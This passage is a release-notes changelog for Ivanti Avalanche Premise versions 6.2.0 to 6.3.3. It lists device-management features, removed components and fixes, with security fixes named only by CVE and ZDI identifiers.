ZDI-CAN-15528 Fix to address ZDI-CAN-15919 Fix to address ZDI-CAN-15966 Fix to address ZDI-CAN-15967 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.3 Description: Avalanche Premise 6.3.3 for Windows Version: v6.3.3.101 Notes: Avalanche 6.3.3 Release What's New in This Version: User Management: Neurons Access Token has been added to allow device commands to be sent from Neurons. Audit Log: Device commands sent from Neurons will be captured and filterable in the audit log. Android Enterprise Restrictions Payload: Allow Developer Options to be enabled on the Android Enterprise devices in Fully Managed mode. Configuring Windows (AIDC) Software Packages: Single use password is now issued and required for launching configuration utilities with software packages. Device Details: Device actions are now enabled or disabled based on the reporting of the enabler capabilities property. Data Repository Service: The DRS has been removed. File and OS Update payloads that used DRS will need to be updated to use the Central FileStore. Component Updates: Updated to Java 15 Updated to Tomcat 9.0.56 Fixes: Fix to address Remote Control service startup error when port 80 is blocked. Fix to address CVE-2021-30497 Fix to address ZDI-CAN-14123 Fix to address ZDI-CAN-14187 Fix to address ZDI-CAN-14188 Fix to address ZDI-CAN-15130 Fix to address ZDI-CAN-15137 Fix to address ZDI-CAN-15168 Fix to address ZDI-CAN-15169 Fix to address ZDI-CAN-15200 Fix to address ZDI-CAN-15217 Fix to address ZDI-CAN-15251 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.2 Description: Avalanche Premise 6.3.2 for Windows Version: v6.3.2.3490 Notes: Avalanche 6.3.2 Release What's New in This Version: Printer management. Discover printers in the warehouse and bring them under management with a streamlined, remote provisioning process. Once your printers are managed by Avalanche, push files and settings to them, receive real-time alerts from them, and view their status remotely. Velocity configuration manifests. Create Velocity manifests to distribute Velocity configuration files from the Central File Store to your Android Enterprise devices. NFC provisioning for Android Enterprise. Use NFC provisioning to send Wi-Fi and enrollment information from an enrolled fully managed Android Enterprise device to new devices. QR code provisioning for Android Enterprise. Use QR code provisioning to send Wi-Fi and enrollment information from an enrolled fully managed Android Enterprise device to new devices. Android Enterprise enabler customization. Use an Android Enterprise enabler customization payload to configure the appearance of the enabler. Credentials certificate payload for Android. Use credentials certificate payloads with Wi-Fi payloads to verify the user or server identity when connecting to enterprise networks with Android and Android Enterprise devices. Temporarily disable lock task mode. To ease troubleshooting, temporarily disable lock task mode on a device from the console or the enabler. Android Enterprise provisioning profile. Use Android Enterprise provisioning profiles to create provisioning QR codes. Scan a provisioning QR code to enroll new fully managed devices with a reduced amount of device interaction. Reboot Android devices from the Avalanche Console. Launch apps on install or reboot. When creating an Android Enterprise software payload, you can select to launch the app on install or reboot. This option is important for installing remote control software. Fixes: Fix: Removed drag and drop in the folder tree. Drag and drop will continue to function when applying Smart Device and Printer profiles. Fix: Custom property changes to an individual device in the device details will not update all devices that share the same custom property. \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.1 Description: Avalanche Premise 6.3.1 for Windows Version: v6.3.1.1507 Notes: Avalanche 6.3.1 Release New Features and Improvements: Android Enterprise Support \*Support for Fully Managed and Dedicated Device (Kiosk) modes \*File Payload \*Restriction Payload (Fully Managed and Dedicated Device modes) \*Disable factory reset from settings \*Remove factory reset protection data \*System Update Policy Payload (Fully Managed and Dedicated Device modes) \*Wi-Fi Payload \*Scan to enroll support using the device camera \*Factory reset wipe command can remove factory reset protection data and wipe the SD card. \*Log file retrieval from device \*New Android Enterprise Enabler https://play.google.com/store/apps/details?id=com.ivanti.enterprise UI performance and user experience \*Load time improvements for Inventory, Profiles, and Rugged Device Details pages \*Inventory page has been split to three tabs: Device Inventory, Server Inventory, and Mobile Device Groups \*Smart Device Payloads have been moved to their own tab \*All Smart Device Payloads have been redesigned from a dialog based UI to a modern page design \*Smart Device Profile has been redesigned from a dialog based UI to a modern page design Velocity config support added for both Android and Android Enterprise management Create scan to enroll QR codes directly from Enrollment Rules UserVoice for Avalanche link UTC data model for custom columns to allow timestamp to be displayed as date and time. Fixes: Fix: Custom properties can now be saved in network and scan to configure profiles. Fix: Scan to configure, custom properties, and registry keys can now be edited after creation. Fix: Certificate Manager improvements \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.0 Description: Avalanche Premise 6.3.0 for Windows Version: v6.3.0.555 Notes: Avalanche 6.3.0 Release New Features and Improvements: Android Enterprise Work Profile Support \*Create new or enroll an existing Google Play Android Enterprise account \*Support for multiple enterprise accounts \*Enrollment Rules reference Google Play Android Enterprise accounts \*Passcode settings support for both Device and Work Profile \*Support for Google Enterprise Play Store apps, including configuration \*Runtime Permissions settings for Apps (Account wide for Google Enterprise or granular per app settings) \*Lock, Unenroll, Delete Work Profile \*New Android Enterprise Enabler https://play.google.com/store/apps/details?id=com.ivanti.enterprise FCM Notification Service support Panasonic OS Updates APN Payload for Android License upgrade from 6.2 to 6.3 (requires a restart of the eserver) Subscription License support HTTP/HTTPS Webserver configuration added to install Prerequisite Software settings for Manifest URL Software Payloads Outgoing IP address of router is reported as IP address setting added to Smart Device Profile Removed: Compliance Payload (Compliance status is now based on Android Enterprise Passcode Compliance) Fixes: Fix: Improved CFS logging Fix: Certificate Manager settings on reboot Fix: CFS access token expiration extended Fix: Android App Name handling with special characters Fix: CFS access token renewal Fix: Reduction in SDS device sync time with selection criteria Fix: Accessing device details from search no longer causes an error Fix: AIDC software profile now shows correct package type \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.2.2 Description: Avalanche Premise 6.2.2 for Windows Version: v6.2.2.197 Notes: Avalanche 6.2.2 Release New Features and Improvements: License upgrade option added to the web console (6.2.2 Only) Removed: Removed support for Java 7, Java 8 is now required Fixes: Security Fixes for CVE-2018-8901 and CVE-2018-8902 Security Fixes for Remote Control Web UI including JQuery updates Fixes to Central File Store configuration page \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.2.0 Description: Avalanche Premise 6.2.0 for Windows Version: v6.2.0.602 Notes: Avalanche 6.2.0 Release Key New/Changed features Overview: Enrollment Enrollment rules now determine whether the enabler will use ANS or GCM as the notification service on android. A new type of enrollment rule has been created called a reference Enrollment Rule (Global Enrollment Rule) has been added that allows rules to be added at regions and deployed to multiple SDservers. You may add a folder that will be created and deployed at the root of all SDservers below the rules region. Broadcast to enroll When a enroll.prf file has been placed on the device with ‘broadcast’ as the server address, it will now perform a UDP broadcast to find a listening SDServer on the same subnet. Multiple Smart Device Servers The SDS node has been altered to have a local Inforail, SDServer, ANServer and File Store. In order to allow this, a SDServer profile has been created. SDS Profile The settings for the central SDS have been moved from the system settings page into a new Smart Device Server Profile. These include: APNS Cert, Google GCM Info, HTTPS Cert, SDS Public Address, Automatic Smart Device Check In, Smart Device Client Administrator Password. SDS Profiles Inheritance has changed, they will aggregate settings instead of overwriting. This allows you to set things like APNS, GCM and wildcard HTTPS certs at a higher level and have them set at lower SDS in the tree. You can then set specific settings such as the SDS public address, or check in times at a locally applied SDS profile. Device Folder Assignment setting allows the enrollment to be placed in a static folder or dynamically place based on folder selection criteria UDP Service Discovery allows the SDS to listen for enrollment broadcasts from the enabler. Central File Store These settings allow you to point to a file share. Files can be uploaded and managed via the Central File Store. You can then use these files in Android manifest URL software payloads, Android file payloads and Android OS Update payloads. Upon deployment of these payloads to an SDS the files will be cached in a file store local to the SDS. Implemented Zebra MX Extensions Now Android Agent applies StageNow config file "avamxmf.xml" placed specific location on SD card "/sdcard/Ivanti/MXMF" using MX framework. Log "MXMS configuration XML file applied successfully" will be displayed when MX config file applied. New Features and Improvements: Scalability - multiple SDS support Improved ANS reliability Distributed file caching Upgrade to Tomcat 8.5 Android device restrictions for post Kitkat devices Vendor specific enablers - Panasonic, Datalogic, Zebra GCM and ANS enabler functionality combined into single enabler Hide Google search box Zebra MX Extensions Reference (Global) enrollment rules Updated passcode payload Updated Restrictions payloads Restrict access to setting application Updated Application whitelisting Updated Application blacklisting Combined GCM and ANS enabler Device wiped if device admin is disabled Devices can broadcast to find their local Avalanche instance and enroll Set NTP server and time zone on device Ivanti Rebrand Removed: DEP Support (system settings and enrollment rule) VPP (Tools>VPP) Windows Phone 8 support (payloads, system settings) LDAP for Login and Enrollment + LDMS connection info (system settings) LDAP Enrollment (Enrollment rule) User Targeting (system settings, user tree) LD Portal (software payload deployment option, link payload deployment option) Media Payload Check for updates (Tools>Check for updates) Android Remote Control Settings (System Settings) Wavelink Remote Control Button in Inventory Page Tiny URL column on enrollment rule page Enabler: Home screen with Remote Control Server Address Enabler: About Screen Enabler: Remote Control capability Fixes: Fix: Improved data validation for java beans Fix: Manifest app installation in android client Fix: Improved functionality with self-signed certificates Fix: Deployments rolled back in large systems Fix: Devices Overwriting one another on Enroll Fix: IP Ranges in selection criteria were treated as a string and not numerically Fix: Data from other payloads sometimes displayed in a new payload

Tag

#ios